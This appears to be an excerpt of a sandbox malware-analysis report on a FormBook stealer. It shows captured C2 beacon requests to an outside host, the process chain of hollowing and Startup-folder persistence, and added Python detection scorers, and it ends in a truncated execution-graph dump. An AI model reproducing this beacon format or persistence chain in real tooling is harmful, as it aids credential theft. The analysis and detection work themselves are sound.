Jan 10, 2025 21:07:49.937206984 CET | 816 | OUT | POST /ir1u/ HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.meliorahomes.net
                                                Referer: http://www.meliorahomes.net/ir1u/
                                                Cache-Control: no-cache
                                                Content-Length: 240
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 74 74 56 49 36 33 66 5a 38 6e 50 47 46 6a 2f 78 30 62 34 6a 6f 4d 5a 71 59 47 34 4a 6a 59 78 67 77 37 33 49 42 38 4b 72 6a 38 35 39 47 51 41 57 32 49 49 55 47 49 50 50 70 61 71 4d 62 72 42 38 72 62 4b 58 32 48 52 76 6a 59 31 51 56 59 49 4f 7a 63 73 7a 66 74 2b 4d 43 2b 4b 65 55 42 46 2f 72 2b 73 58 61 6f 77 44 33 68 34 6c 77 38 63 69 70 46 35 4a 45 2b 67 33 49 73 75 72 74 36 58 38 65 42 4a 34 4c 46 36 32 77 58 62 69 73 47 55 77 75 4c 4d 58 37 56 62 56 6a 65 4e 43 31 4c 41 7a 43 48 64 57 65 42 31 69 6d 6c 2b 72 78 76 46 58 46 6e 57 49 7a 76 4d 32 73 46 54 65 41 3d
                                                Data Ascii: A2jpdtl=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgttVI63fZ8nPGFj/x0b4joMZqYG4JjYxgw73IB8Krj859GQAW2IIUGIPPpaqMbrB8rbKX2HRvjY1QVYIOzcszft+MC+KeUBF/r+sXaowD3h4lw8cipF5JE+g3Isurt6X8eBJ4LF62wXbisGUwuLMX7VbVjeNC1LAzCHdWeB1iml+rxvFXFnWIzvM2sFTeA=
Jan 10, 2025 21:07:50.866570950 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:50 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


Session ID: 7
Source IP: 192.168.2.7
Source Port: 50262
Destination IP: 8.217.17.192
Destination Port: 80
PID: 7088
Process: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:52.487870932 CET | 1829 | OUT | POST /ir1u/ HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.meliorahomes.net
                                                Referer: http://www.meliorahomes.net/ir1u/
                                                Cache-Control: no-cache
                                                Content-Length: 1252
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 6c 74 56 37 79 33 66 2b 51 6e 4f 47 46 6a 6a 42 30 65 34 6a 6f 52 5a 70 6f 43 34 49 66 49 78 69 34 37 6d 62 4a 38 61 4f 58 38 77 39 47 51 49 32 32 4a 4c 6b 47 64 50 4f 46 65 71 49 2f 72 42 38 72 62 4b 55 2b 48 58 2b 6a 59 7a 51 55 71 41 75 7a 51 6f 7a 65 79 2b 4d 61 78 4b 65 41 52 47 4f 58 2b 73 33 4b 6f 31 78 76 68 2b 31 77 2b 62 69 70 64 35 4a 34 58 67 33 55 4b 75 6f 77 74 58 38 6d 42 4c 63 4b 2b 76 43 38 44 4d 53 70 66 4c 44 4b 48 45 30 71 6b 45 6b 2f 44 4b 52 42 49 4e 42 4f 37 59 58 53 32 2b 6c 37 46 6f 64 5a 64 41 57 30 7a 66 50 4f 69 66 44 30 59 45 70 65 57 6e 44 35 44 62 6d 55 6e 4a 39 46 50 38 71 69 66 4d 4e 63 6f 6a 61 76 76 33 6a 47 75 2f 62 76 77 36 30 6b 71 4b 6e 64 69 30 50 6c 7a 45 5a 37 30 74 71 35 6b 59 41 6b 2b 2b 47 69 46 39 46 51 54 50 50 44 6b 4e 4e 74 70 34 65 31 31 51 59 54 77 55 66 54 30 63 66 6f 6a 4f 31 35 43 38 47 4d 72 7a 70 [TRUNCATED]
Data Ascii: A2jpdtl=… [TRUNCATED]
Jan 10, 2025 21:07:53.386699915 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:53 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


Session ID: 8
Source IP: 192.168.2.7
Source Port: 50263
Destination IP: 8.217.17.192
Destination Port: 80
PID: 7088
Process: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:55.606630087 CET | 522 | OUT | GET /ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41 HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Jan 10, 2025 21:07:56.497524023 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:56 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
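
The sessions above share one beacon shape: a short lowercase C2 directory (/ir1u/), a single opaque base64-like parameter (A2jpdtl=...) sent either as a form body or as a query string, a legacy Windows Phone User-Agent, Connection: close, and Origin/Referer that point back at the beacon host. The following scorer is an added example written by the editor; it is not Joe Sandbox code and not one of the report's signatures. The regular expressions, the indicator names and the threshold of four are the editor's assumptions, and the three sample requests are constructed (payload blobs shortened) to resemble sessions 5 and 8, plus a benign request for contrast.

```python
"""Score raw HTTP requests for the FormBook-style beacon shape seen in the report.

Added example (editor's heuristics, not Joe Sandbox code). Regexes, indicator
names, threshold and the constructed sample requests are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# User-Agent observed in every request of the captured sessions.
SUSPECT_UA = ("Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; "
              "Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)")
# Assumed C2 path shape: one short alphanumeric directory, e.g. /ir1u/
C2_PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
# Assumed payload shape: <name>=<base64-ish blob>[&<name>=<short token>]
PARAM_RE = re.compile(
    r"^[A-Za-z0-9]{4,12}=[A-Za-z0-9+/=]{20,}(?:&[A-Za-z0-9]{2,6}=[A-Za-z0-9]{1,12})?$"
)


@dataclass
class Request:
    method: str
    target: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.1 request (CRLF or LF) into method, target, headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers, body.strip())


def score_request(req: Request) -> List[str]:
    """Return the indicators a request matches; an empty list means none fired."""
    hits: List[str] = []
    path, _, query = req.target.partition("?")
    if C2_PATH_RE.match(path):
        hits.append("short-c2-path")
    if req.headers.get("user-agent") == SUSPECT_UA:
        hits.append("formbook-ua")
    if req.headers.get("connection", "").lower() == "close":
        hits.append("connection-close")
    host = req.headers.get("host", "")
    if host and req.headers.get("origin", "").endswith("://" + host):
        hits.append("origin-matches-host")
    # POST beacons carry the blob in the body, GET beacons in the query string.
    payload = req.body if req.method == "POST" else query
    if PARAM_RE.match(payload):
        hits.append("opaque-single-param")
    return hits


def is_formbook_like(raw: str, threshold: int = 4) -> bool:
    """True when at least `threshold` indicators fire (threshold is an assumption)."""
    return len(score_request(parse_request(raw))) >= threshold


# Constructed samples modelled on sessions 5 and 8 above (blobs shortened).
SAMPLE_POST = (
    "POST /ir1u/ HTTP/1.1\r\n"
    "Host: www.meliorahomes.net\r\n"
    "Origin: http://www.meliorahomes.net\r\n"
    "Referer: http://www.meliorahomes.net/ir1u/\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {SUSPECT_UA}\r\n"
    "\r\n"
    "A2jpdtl=jai/NoPHoBCQh8m21NS+Q5zf5LhfWxfoCIgMy1AUbSJtVoK3edonCmFj0R0S2DoLZqUO4Jv==\r\n"
)
SAMPLE_GET = (
    "GET /ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu&7pG=BhQ41 HTTP/1.1\r\n"
    "Host: www.meliorahomes.net\r\n"
    "Connection: close\r\n"
    f"User-Agent: {SUSPECT_UA}\r\n"
    "\r\n"
)
# Constructed benign request for contrast.
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, raw in (("POST", SAMPLE_POST), ("GET", SAMPLE_GET), ("benign", SAMPLE_BENIGN)):
        print(name, is_formbook_like(raw), score_request(parse_request(raw)))
```

The scorer is a triage aid, not a signature: the 404 responses show the server was not answering this bot, so the beacon shape, not the response, is what identifies the traffic. Treat the Suricata alerts listed in the report as the authoritative network detection and use a scorer like this to pull matching flows out of a larger proxy or PCAP log.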



                                                Target ID:5
                                                Start time:15:05:51
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\25Lz840Dmh.exe"
                                                Imagebase:0xbf0000
                                                File size:1'169'920 bytes
                                                MD5 hash:6C35B069B37095A1788E5C7B51A60E97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:7
                                                Start time:15:05:52
                                                Start date:10/01/2025
                                                Path:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\25Lz840Dmh.exe"
                                                Imagebase:0xf0000
                                                File size:1'169'920 bytes
                                                MD5 hash:6C35B069B37095A1788E5C7B51A60E97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 74%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:15:05:54
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\25Lz840Dmh.exe"
                                                Imagebase:0x690000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:15:06:05
                                                Start date:10/01/2025
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"
                                                Imagebase:0x7ff67efa0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:15:06:06
                                                Start date:10/01/2025
                                                Path:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
                                                Imagebase:0xf0000
                                                File size:1'169'920 bytes
                                                MD5 hash:6C35B069B37095A1788E5C7B51A60E97
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:13
                                                Start time:15:06:09
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
                                                Imagebase:0x690000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:16:19:48
                                                Start date:10/01/2025
                                                Path:C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe"
                                                Imagebase:0x2e0000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:15
                                                Start time:16:19:53
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\mobsync.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                Imagebase:0x1a0000
                                                File size:93'696 bytes
                                                MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:18
                                                Start time:16:20:05
                                                Start date:10/01/2025
                                                Path:C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe"
                                                Imagebase:0x2e0000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:20
                                                Start time:16:20:20
                                                Start date:10/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff722870000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true
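
The Target ID entries above carry three host-side tells that a path-plus-command-line view alone can surface: svchost.exe (Targets 9 and 13) runs with the dropper's command line, the footprint of a hollowed process; wscript.exe (Target 10) runs fricandeaus.vbs out of the per-user Startup folder; and the dropped copy (Targets 7 and 11) runs from AppData\Local. The triage below is an added example by the editor, not Joe Sandbox code and not the report's signatures. Its records are constructed from the path and command line of the entries above, and the three checks and their wording are the editor's heuristics.

```python
"""Triage process records for hollowing and startup-persistence indicators.

Added example (editor's heuristics, not Joe Sandbox code). Records are
constructed from the Target ID entries in the report; the checks are
assumptions, not the report's signatures.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List

STARTUP_DIR = r"\microsoft\windows\start menu\programs\startup"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = (r"\appdata\local", r"\appdata\roaming")


@dataclass
class Proc:
    target_id: int
    path: str      # image path as reported
    cmdline: str   # command line as reported


def first_token(cmdline: str) -> str:
    """Executable named by a Windows command line, honouring a quoted argv[0]."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def indicators(p: Proc) -> List[str]:
    """Indicators fired by one record; an empty list means nothing fired."""
    hits: List[str] = []
    image = ntpath.basename(p.path).lower()
    claimed = ntpath.basename(first_token(p.cmdline)).lower()
    # Image on disk differs from the executable the command line names:
    # what a hollowed or replaced process looks like in a process list.
    if claimed and claimed != image:
        hits.append(f"image/cmdline mismatch: {image} started as {claimed}")
    # Script host executing something out of the per-user Startup folder.
    if image in SCRIPT_HOSTS and STARTUP_DIR in p.cmdline.lower():
        hits.append("script host running a file from the Startup folder")
    # Binary executing from a user-writable profile directory.
    if any(d in p.path.lower() for d in USER_WRITABLE):
        hits.append("executable running from a user-writable AppData path")
    return hits


def triage(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map target id -> indicators for every record that fired at least one."""
    result: Dict[int, List[str]] = {}
    for p in procs:
        hits = indicators(p)
        if hits:
            result[p.target_id] = hits
    return result


# Constructed from the Target ID entries above (path and command line only).
SAMPLE_PROCS = [
    Proc(5, r"C:\Users\user\Desktop\25Lz840Dmh.exe",
         r'"C:\Users\user\Desktop\25Lz840Dmh.exe"'),
    Proc(9, r"C:\Windows\SysWOW64\svchost.exe",
         r'"C:\Users\user\Desktop\25Lz840Dmh.exe"'),
    Proc(10, r"C:\Windows\System32\wscript.exe",
         r'"C:\Windows\System32\WScript.exe" '
         r'"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"'),
    Proc(11, r"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe",
         r'"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"'),
    Proc(15, r"C:\Windows\SysWOW64\mobsync.exe",
         r'"C:\Windows\SysWOW64\mobsync.exe"'),
]

if __name__ == "__main__":
    for tid, hits in triage(SAMPLE_PROCS).items():
        print(tid, hits)
```

Note what this view misses: Targets 14 and 15 (LHSqcaLVnKQk.exe and mobsync.exe) have a command line that matches their image and sit in non-profile paths, so they fire nothing here even though the report's Yara matches show FormBook in their memory. Path and command-line triage narrows the list; the in-memory scan is what confirms the injected stage.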


                                                  Execution Graph

                                                  Execution Coverage:3.7%
                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                  Signature Coverage:6.4%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:55
execution_graph: the node and edge dump of the rendered graph (node ids from 104141, addresses from 0xbf107d) does not survive as text and is truncated in the source, so it is reduced here to what it names. Windows API calls on its nodes: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetModuleFileNameW, RtlAllocateHeap, RtlFreeHeap, GetLastError, DecodePointer, EncodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetModuleHandleExW, GetProcAddress, ExitProcess, RaiseException. CRT internals on its nodes: __write_nolock, _memmove, _wcscat, __NMSG_WRITE, __getptd_noexit, __realloc_crt, _free, _doexit, __freefls@4, __lock, std::exception::exception, ___crtCorExitProcess; many nodes also carry the label "Mailbox".
bffd3d 104405 c3472d 104404->104405 104453 c006f6 104404->104453 104492 bff234 104404->104492 104610 c59e4a 89 API calls 4 library calls 104405->104610 104409 c34742 104410 c3488d 104410->104409 104414 bffe4c 104410->104414 104616 c6a2d9 85 API calls Mailbox 104410->104616 104411 bffe3e 104411->104410 104411->104414 104614 c466ec 59 API calls 2 library calls 104411->104614 104412 c00517 104419 c10db6 Mailbox 59 API calls 104412->104419 104413 c347d7 104413->104409 104612 c59e4a 89 API calls 4 library calls 104413->104612 104422 c348f9 104414->104422 104469 c34b53 104414->104469 104496 bf837c 104414->104496 104417 c10db6 59 API calls Mailbox 104443 bffdd3 104417->104443 104429 c00545 _memmove 104419->104429 104420 c34848 104615 c460ef 59 API calls 2 library calls 104420->104615 104430 c34917 104422->104430 104618 bf85c0 59 API calls Mailbox 104422->104618 104425 c34755 104425->104413 104611 bff6a3 341 API calls 104425->104611 104427 c348b2 Mailbox 104427->104414 104617 c466ec 59 API calls 2 library calls 104427->104617 104436 c10db6 Mailbox 59 API calls 104429->104436 104434 c34928 104430->104434 104619 bf85c0 59 API calls Mailbox 104430->104619 104431 bffea4 104439 c34ad6 104431->104439 104440 bfff32 104431->104440 104475 c00179 Mailbox _memmove 104431->104475 104432 c3486b 104435 bf9ea0 341 API calls 104432->104435 104434->104475 104620 c460ab 59 API calls Mailbox 104434->104620 104435->104410 104480 c00106 _memmove 104436->104480 104629 c59ae7 60 API calls 104439->104629 104441 c10db6 Mailbox 59 API calls 104440->104441 104446 bfff39 104441->104446 104443->104409 104443->104411 104443->104412 104443->104417 104443->104425 104443->104429 104457 c3480c 104443->104457 104584 bf9ea0 104443->104584 104446->104453 104503 c009d0 104446->104503 104447 c34a4d 104448 bf9ea0 341 API calls 104447->104448 104450 c34a87 104448->104450 104450->104409 104624 bf84c0 104450->104624 104452 bfffb2 104452->104429 104452->104453 104460 bfffe6 104452->104460 104609 c59e4a 89 API calls 
4 library calls 104453->104609 104613 c59e4a 89 API calls 4 library calls 104457->104613 104459 c34ab2 104628 c59e4a 89 API calls 4 library calls 104459->104628 104467 c00007 104460->104467 104630 bf8047 104460->104630 104461 c10db6 59 API calls Mailbox 104461->104475 104466 c00398 104466->104392 104467->104453 104468 c34b24 104467->104468 104471 c0004c 104467->104471 104634 bf9d3c 60 API calls Mailbox 104468->104634 104469->104409 104635 c59e4a 89 API calls 4 library calls 104469->104635 104471->104453 104471->104469 104472 c000d8 104471->104472 104580 bf9d3c 60 API calls Mailbox 104472->104580 104474 c34a1c 104477 c10db6 Mailbox 59 API calls 104474->104477 104475->104447 104475->104453 104475->104459 104475->104461 104475->104466 104475->104474 104582 bf8740 68 API calls __cinit 104475->104582 104583 bf8660 68 API calls 104475->104583 104621 c55937 68 API calls 104475->104621 104622 bf89b3 69 API calls Mailbox 104475->104622 104623 bf9d3c 60 API calls Mailbox 104475->104623 104476 c000eb 104476->104453 104581 bf82df 59 API calls Mailbox 104476->104581 104477->104447 104480->104475 104481 c00162 104480->104481 104608 bf9c90 59 API calls Mailbox 104480->104608 104481->104392 104482->104386 104483->104392 104484->104392 104485->104401 104486->104401 104488 bf818f 104487->104488 